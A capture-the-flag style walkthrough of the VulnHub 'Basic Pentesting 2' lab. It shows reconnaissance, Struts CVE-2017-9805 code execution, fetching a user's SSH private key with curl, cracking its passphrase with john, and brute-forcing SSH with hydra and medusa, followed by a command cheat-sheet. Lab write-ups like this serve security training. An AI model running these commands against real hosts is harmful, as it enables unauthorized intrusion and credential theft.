VulnHub – Basic Pentesting 2

Walkthrough of the exploitation of Basic Pentesting 2 from VulnHub.


Our attacking box is a virtual machine that has the IP and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 2, a vulnerable virtual machine to practice penetration testing. It has the IP and we have no further information about this target.

Information Gathering

We start by running nmap on the target IP.

nmap -sV -Pn -n
Image 1: nmap scan of the target.

We have the following open ports to investigate:

  • SSH server (OpenSSH 7.2p2 on port 22)
  • webserver (Apache 2.4.18 on port 80)
  • Samba (smbd 3.X-4.X on ports 139 and 445)
  • Apache Jserv (1.3 on port 8009)
  • Apache Tomcat (9.0.7 on port 8080)

Let’s check out the webserver first by opening in the browser.

Image 2: Connecting to the webserver.

Next, we run nikto to get some more information.

nikto -h
Image 3: nikto scan of the target.

Once again, we discover an interesting director called /development/ and we open it in a browser.

Image 4: The /development/ directory.

The directory contains two .txt files that we also open.

Image 5: The dev.txt file.
Image 6: The j.txt file.

It seems like there are at least two users with the initials “J” and “K”. Furthermore “K” seems to be an admin and “J” seems to use a weak password. That’s good to know. Apart from the Apache and SMB servers that we already know about, “K” mentions a struts 2.5.12 REST example. A quick Google search suggests that the default location for that example code is

Image 7: struts2 showcase page.

It seems like the struts2 test is still running. A bit of googling (“struts 2.5.12 cve”) reveals that version 2.5.12 is exploitable with code execution as indicated by CVE-2017-9805 [1].


We find a Python script to exploit the vulnerability by googling “CVE-2017-9805 exploit github” [2] and copy and paste the script into a file on our attack box. To test if everything works, we’ll send a ping command to our attack box through the exploit and check for incoming icmp packages with tcpdump on our attack box.

sudo tcpdump -n icmp
python3 -u "" -c "ping -c2" --exploit

As we can see, the ping is sent from the target machine to our attack box.

Image 8: Receiving icmp packages through the exploit.

At this point we reach a temporary dead end because we tried to run a couple of reverse shells and none worked. It seems like you cannot run any commands with ; or &&. After a while we realized that we could try to run a server and connect to it. Running the default Python 2 webserver on port 9090 on the target machine worked.

python3 -u "" -c "python -m SimpleHTTPServer 9090" --exploit

After connecting to with a browser, we get a nice directory listing of the filesystem that we can explore.

Image 9: Directory listing after connecting to the Python webserver.

Post Exploitation

After entering the /home directory, we see that the usernames of “J” and “K” are jan and kay respectively. Our initial thought is to grab /etc/shadow and decrypt jan’s supposedly weak password. However, we only get a 404 when we try to access the file. However, there are a lot of interesting things in kay’s home directory.

Image 10: Home directory of kay.

Unfortunately, pass.bak, which could be a backup file for the password, cannot be accessed. However, the .ssh directory can be entered and contains a private key (id_rsa) that we can download.

curl > id_rsa

We also note that kay can login as admin, as indicated by the existence of the .sudo_as_admin_successful file.

If we try to login with the obtained key, we get a warning about the persmissions of the key file so we change that first and then connect via ssh.

chmod 600 id_rsa
ssh -i id_rsa kay@
Image 11: ssh asks for a passphrase.

Unfortunately, ssh asks for a passphrase. We can use john to crack the passphrase but we first have to convert it to a suitable format with We will also use a wordlist of common passwords that were exposed after an attack on RockYou [3]. The wordlist comes preinstalled with Kali but we have to unzip it first.

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
Image 12: Cracked ssh passphrase.

With the passphrase we ssh into the target machine and immediately try to become root. Unfortunately, we still need kay’s password. Thankfully, we remember the file pass.bak that we couldn’t access before. Sure enough, it contains the correct password and we become root. Mission accomplished 🙂

Image 13: Mission accomplished.

Alternative Attacks

ssh cracking

Since smbd is running on the target, we can use enum4linux to get some information about local users of the system.

enum4linux -r
Image 14: Username enumeration with enum4linux.

We can see that there are two local users named “kay” and “jan” on the system. We remember from before, that the user “jan” supposedly has a weak password in /etc/shadow. From this, we deduce that he will probably use weak passwords everywhere and try to crack his ssh password with medusa.

medusa -h -f -g 5 -u 'jan' -P /usr/share/wordlists/rockyou.txt -M ssh
Image 15: Medusa scan for ssh.

Alternatively, we can use hydra, which was a bit faster than medusa.

hydra -l 'jan' -P /usr/share/wordlists/rockyou.txt ssh
Image 16: Hydra scan for ssh.

The scans reveal the password “armando” which we use to ssh to the target machine.

Image 17: We are logged in as user jan.

Unfortunately, we are not allowed to sudo so we have to find another way to escalate our privileges on this machine. Poking around a bit, we see that we can cd into the home directory of kay. From there, we can cd into his .ssh directory and cat id_rsa and repeat the steps from our initial attack to gain root access.


To get more information about smbd, we scan the smbd ports (139,445) again but this time, we also use nmap’s script scan (-sC) feature.

sudo nmap -sV -sC -Pn -n -p 139,445
Image 18: nmap scan of the smbd ports, script scan active.

It seems like the smbd version is 4.3.11. We can also use nmap to enumerate smb shares.

nmap -sV --script=smb-enum-shares -p 445
Image 19: Using nmap to enumerate smb shares.

…and nmblookup to lookup NetBIOS names.

nmblookup -A
Image 20: nmblookup of target.

We can see that there’s an account named guest. We try to connect without a password.

smbclient -W 'WORKGROUP' //''/Anonymous -U''%''
Image 21: Successfull connection to the smb server and extraction of staff.txt.

Let’s see if the smbd is vulnerable by googling “smbd 4.3.11 cvs” which yields a whopping 21 vulnerabilities [4]. The most promising is CVE-2017-7494, also known as SambaCry [5]. Unfortunately, it seems like we are not allowed to write to the share (even though nmap previously reported we have READ/WRITE access), which is a prerequisite for the exploit [6].

Image 22: No write access to the smb share.

We can confirm this with smbmap.

Image 23: smbmap output that confirms that the share is READ ONLY.

This concludes our further tests.

Lessons Learned

Information gathering

Always check out the contents of all non-standard files that you can read. There might be some interesting information (like development and testing environments or notes about password security).

Username enumeration if samba is running:

enum4linux -r TARGET-IP


Listen for incoming ping

Useing tcpdump to listen for a ping is a good way of checking remote code execution. Just run ping -c2 ATTACK-IP from the target box.

sudo tcpdump -n icmp

Run a webserver on the target machine

python -m SimpleHTTPServer PORT

Cracking ssh passwords

medusa -h TARGET-IP -f -g 5 -u 'USERNAME' -P /usr/share/wordlists/rockyou.txt -M ssh
hydra -l 'USERNAME' -P /usr/share/wordlists/rockyou.txt TARGET-IP ssh


Get information about samba on the target:

sudo nmap -sV -sC -Pn -n -p 139,445 TARGET-IP
nmap --script=smb-enum-shares -p 445 TARGET-IP
nmblookup -A TARGET-IP

Check access rights and list files:

smbmap -R -H TARGET-IP

Connect to a samba share. The argument passed via -U is username%password. If left empty, an annonymous login is tried.

smbclient -W 'WORKGROUP' //''/SHARENAME -U ''%''

Post Exploitation


Always check the home directories for interesting content. SSH keys are especially useful if ssh is running on the target. Get id_rsa either by copy&pasting it or by getting it through a webserver we started.

curl http://IP:PORT/home/USERNAME/.ssh/id_rsa > id_rsa

Connect via ssh with a keyfile:

chmod 600 id_rsa
ssh -i id_rsa USERNAME@TARGET-IP

Cracking ssh pass phrases (RockYou wordlist):

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash


A .sudo_as_admin_successful file indicates, that this user can become root.